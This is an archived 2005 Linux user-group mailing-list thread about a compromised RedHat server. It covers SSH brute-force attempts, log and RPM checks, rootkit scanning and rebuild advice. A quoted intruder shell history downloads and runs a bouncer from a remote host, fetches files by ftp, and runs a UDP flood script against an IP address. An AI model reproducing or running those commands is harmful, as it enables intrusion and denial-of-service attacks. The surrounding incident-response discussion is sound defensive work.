Welp,
We were compromised. I found this in a history file:
  176  wget xena.utcluj.ro/~redalien/psyBNC2.3.2-4.tar.gz
  177  tar zxvf psyBNC2.3.2-4.tar.gz
  178  rm -rf psyBNC2.3.2-4.tar.gz
  179  cd psybnc
  180  ls
  181  make
  182  ./psybnc
  183  cat log/psybnc.log
  184  ps x
  185  ls
  186  kill -9 1503
  187  cd ..
  188  ls
  189  rm -rf psybnc
  190  ftp pytycu.netfirms.com
  191  ls
  192  chmod +x udp.pl
  193  ./udp.pl
  194  ./udp.pl 207.179.120.86 53 0
  195  ps x
  196  ftp ftp.as.ro
  197  tar xvf bootP.tgz
  198  cd bot
  199  ls
  200  ./portmap
  201  ./portmap
  202  ./portmap
  203  ps x
psyBNC appears to be an IRC bouncer/tunneling tool, and udp.pl is a UDP flooding script.
All the time stamps on these files / directories indicate that this all occurred on May 9th.
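To double-check that nothing else was dropped in that window, I'm planning to sweep the filesystem for anything modified on the 9th; roughly something like this (GNU find on this box, and the reference-file trick is just to bound the window):

  # mark the start and end of May 9th with two reference timestamps
  touch -t 200505090000 /tmp/win_start
  touch -t 200505100000 /tmp/win_end
  # list regular files modified in between, staying on the root filesystem
  find / -xdev -type f -newer /tmp/win_start ! -newer /tmp/win_end -ls 2>/dev/null

Of course mtimes are trivial to forge, so I'm treating that as a starting point rather than proof of anything.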
I guess I should contact the university in Romania whose server was hosting the psyBNC tarball, and Netfirms, to let them know that their systems have been compromised as well...
Any other advice?
Some comments below...
On May 10, 2005, at 5:11 PM, larry price wrote:
Is the system set up to record both illegal user names and failed password attempts?
I don't think so, I'll have to look in to this.
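In the meantime I can at least grep what we do have. Assuming sshd on this RedHat box logs to /var/log/secure* (it may only show up in /var/log/messages*), something like:

  # failed-password lines vs. attempts on nonexistent accounts, per log file
  grep -c 'Failed password' /var/log/secure* /var/log/messages*
  grep -ci 'illegal user'   /var/log/secure* /var/log/messages*

  # rough tally of which usernames were being guessed (the awk field may need adjusting)
  grep -hi 'illegal user' /var/log/secure* | awk '{print $8}' | sort | uniq -c | sort -rn | head

should at least tell me whether the "Illegal user" lines are being recorded at all.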
I had this same bit of paranoia when the daily security output (email) from one of my webservers showed a failed attempt to log in as me.
A bit of digging and I was able to ascertain that the security output on that box only included failed password logins, not illegal username attempts, and that the failed login on my account was part of a long string of other usernames being tried.
Of course, if you are getting repeated attempts on a distinctive username that isn't likely to exist elsewhere... you may be targeted.
But there are a lot of ways for that information to leak: for instance, if your employee email addresses are the same as their usernames, or you have a publicly available ticket system, employee directory, or the like.
From your description it sounds like this machine:
1. has not been updated for some time
This is somewhat accurate, some stuff has been updated, but obviously I will need to do a more comprehensive check.
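For the comprehensive check, my plan is to ask RPM what's installed and whether any packaged files have been tampered with; something along these lines (up2date is what I think this box uses for updates, and rpm -Va output needs interpreting since config files legitimately change):

  rpm -qa --last | head -25   # most recently installed/updated packages, newest first
  rpm -Va                     # verify installed files against the RPM database
  up2date --list              # list available updates from RHN (need to double-check the flag)

None of which is trustworthy if the rpm binary itself was replaced, but it's a start.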
2. failed for an unknown reason
3. is currently in an unknown state but has some evidence of attempted compromise on it.
It has been compromised, but no longer has port forwarding set up.
If this machine has to be online, you need to assure yourself that:
1. it's unlikely to have been compromised (this is the fuzzy, hard-to-quantify criterion)
2. it's currently up to date on security patches, etc.
3. other, more critical machines do not trust it.
If it's not critical that it be online, take it down, and go to work with the forensics toolkit to see if you can find anything, but copy any data off and rebuild it before you put it back in production.
Potentially useful links:
http://www.porcupine.org/forensics/tct.html (the Coroner's Toolkit)
chkrootkit.org -- check locally for signs of a rootkit
I'll check some of this stuff out.
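For my own notes, a first pass with chkrootkit would probably look like this; I'm assuming I build it on a clean machine and either copy it over or run it against the suspect disk mounted elsewhere, since the local binaries can't be trusted:

  # on a known-clean box
  tar xzf chkrootkit.tar.gz
  cd chkrootkit-*
  make sense                  # chkrootkit's build target
  ./chkrootkit                # or: ./chkrootkit -r /mnt/suspect  against a mounted image

The Coroner's Toolkit side (grave-robber, mactime) I'll have to read up on before I touch the disk, since the order of operations matters for preserving evidence.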
remember that your tools can't do your thinking for you.
On 5/10/05, Jim Beard <[EMAIL PROTECTED]> wrote:
Howdy folks,
So the other day I had a RedHat server hang on me. It had been up for
250ish days I think, so I rebooted it and started looking through the
system logs (/var/log/message*) to see if anything might have been
logged to hint at why the machine had hung. What I found was a lot of
ssh brute force login attempts for standard accounts. We had the ssh
port tunneled through the firewall. So this didn't really seem all
that exciting, as I realize people get port scanned constantly and ssh
was open. But then I noticed something that did disturb me. A few
lone ( or maybe groups of 2 or 3 ) attempts were made on non-standard
accounts. On old system user accounts. Theoretically an ex-employee
could be doing it, but I find that a bit doubtful. The standard ssh
port and a port going to a Tomcat web app server have been the only
ports forwarded to the machine...
Anyone got any advice on figuring out if some other compromise might
have been used to determine the system users? Or.. Anyone got any
advice on figuring out why the machine originally hung? I could not
bring up a terminal when connected directly to the machine, it would
not respond to ssh connections. My guess was that it ran out of
process ids or the /var partition filled up...
--
http://Zoneverte.org -- information explained
Do you know what your IT infrastructure does?
Jim Beard
counterclaim, Inc
http://www.counterclaim.com
http://openefm.sourceforge.net
(800) 264-8145

_______________________________________________
EUGLUG mailing list
[email protected]
http://www.euglug.org/mailman/listinfo/euglug
